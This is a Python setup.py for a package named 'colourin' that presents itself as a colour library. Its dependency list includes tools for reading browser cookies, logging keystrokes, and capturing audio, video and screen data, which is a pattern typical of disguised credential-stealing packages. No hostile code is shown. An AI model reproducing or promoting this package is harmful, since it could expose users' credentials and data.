from setuptools import setup







setup(
    name='colourin',
    version='1.3.0',    
    description='Your gateway to colours in python!',
    url='https://github.com',
    author='Luke Joseph',
    author_email='lol@gmail.com',
    license='BSD 2-clause',
    packages=['colourin'],
    install_requires=["requests","cryptography","consolecmds","wmi","pathlib","opencv-python","screeninfo","psutil","httpx","flask","pynput","pillow","browser_cookie3","pyaudio","bleach","pypiwin32","pycryptodome","pygame"],


)